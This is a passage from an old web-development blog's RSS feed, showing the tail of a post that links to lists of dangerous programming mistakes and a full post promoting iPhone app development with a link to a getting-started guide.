<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">http://www.infoq.com/news/2010/03/Top-25-Programming-Errors</div>
<div style="padding:5px 0 12px">Learn this serious mistakes and do not DO them! <a title="Serious programming mistakes" href="http://www.codinghorror.com/blog/2009/01/top-25-most-dangerous-programming-mistakes.html" target="_blank">25 most Dangerous programming mistakes. </a></div>
<div style="padding:5px 0 12px">Learn this general programming mistakes which you should not repeat them:  <a href="http://www.infoq.com/news/2010/03/Top-25-Programming-Errors" target="_blank">25 programming errors. </a></div>
</div>
<div id="__ss_472388" style="width: 425px;"></div>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/php-best-practices-and-worst-mistakes/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Getting started with iPhone application development</title>
		<link>http://blog.macronimous.com/getting-started-with-iphone-application-development/</link>
		<comments>http://blog.macronimous.com/getting-started-with-iphone-application-development/#comments</comments>
		<pubDate>Sat, 27 Mar 2010 09:45:30 +0000</pubDate>
		<dc:creator>macronimous</dc:creator>
				<category><![CDATA[Mobile development]]></category>
		<category><![CDATA[Web business]]></category>
		<category><![CDATA[iPhone Development]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[iPhone application]]></category>
		<category><![CDATA[iphone development]]></category>

		<guid isPermaLink="false">http://blog.macronimous.com/?p=198</guid>
		<description><![CDATA[There  1.4 million free and paid applications already exists in the iTunes app store. Though this count is very high, there is still plenty of scope for more applications to be developed and it will only stop when we humans quench our thirst for creativity. More than a mobile phone, iPhone is looked upon as [...]]]></description>
			<content:encoded><![CDATA[<p>There  1.4 million free and paid applications already exists in the iTunes app store. Though this count is very high, there is still plenty of scope for more applications to be developed and it will only stop when we humans quench our thirst for creativity.</p>
<p><a href="http://www.macronimous.com/resources/getting_started_with_iPhone_development.asp"><img class="alignright" title="xcode screen within the IDE" src="http://www.macronimous.com/images/iPhone%20Development_2.jpg" alt="" width="346" height="216" /></a></p>
<p>More than a mobile phone, iPhone is looked upon as a lifestyle accessory, which is fun and exciting to use. The main strength of iPhone would be its retaining capability. Similar to most MAC users who would find it difficult to work in other platforms like Windows, most iPhone users will find it difficult to use other mobile phones. This will make the device and its applications to grow for a long time.</p>
<p>iPhone application development is unique in a way that it is not mandatory to have a group of people working under an organization to create iPhone applications. It is also well suited for individuals to unleash their creativity and earn a handful of money and fame too. There are applications like tossing a coin, which has attracted a lot of downloads- Kudos to the thought.</p>
<p>Why not you be a part of this revolution? All you need to do is a MAC machine, an iPod or iPhone preferably, Internet connection and Click here to view our first part of the article – “<a href="http://www.macronimous.com/resources/getting_started_with_iPhone_development.asp" target="_blank">Getting Started with iPhone Development</a>”</p>


<!-- Begin TwitThis script (http://twitthis.com/) -->
<div style="text-align:left;">
<script type="text/javascript" src="http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js"></script>
<script type="text/javascript">
<!--
document.write('<a href="javascript:;" onclick="TwitThis.pop();"><img src="http://s3.chuug.com/chuug.twitthis.resources/twitthis_grey_72x22.gif" alt="TwitThis" style="border:none;" /></a>');
//-->
</script>
</div>
<!-- /End -->

]]></content:encoded>
			<wfw:commentRss>http://blog.macronimous.com/getting-started-with-iphone-application-development/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
